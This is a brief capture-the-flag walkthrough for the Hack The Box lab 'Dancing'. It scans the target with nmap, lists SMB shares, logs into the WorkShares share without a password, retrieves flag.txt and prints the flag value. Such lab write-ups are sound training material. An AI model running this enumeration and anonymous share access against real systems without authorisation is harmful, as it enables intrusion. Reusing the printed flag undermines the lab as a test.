74 words
1 minute
Dancing
Machine Information
- Platform: HTB
- Lab: Starting Point
- OS: Windows
- Difficulty: Very Easy
- IP:
10.129.1.12
Step 0: Getting Started
If you’re not sure how to get started, this will help.
mkdir -p HTB/LAB/DANCING && cd HTB/LAB/DANCINGIP=10.129.1.12 && ping -c 2 $IPSee also: Here.
YEP!
Step 1: Recon
nmap -sC -sV $IP
445/tcp (SMB) is open. Try microsoft-ds — SMB share enumeration.
Step 2: Solution
SMB Share List
smbclient -L //$IP # listsmbclient -N //$IP/WorkShares # ConnectPassword: Enter
Flag
lscd James.Plsget flag.txtexitFlag
cat flag.txt
5f61c10dffbc77a704d76016a22f1664and PASTE!
Some information may be outdated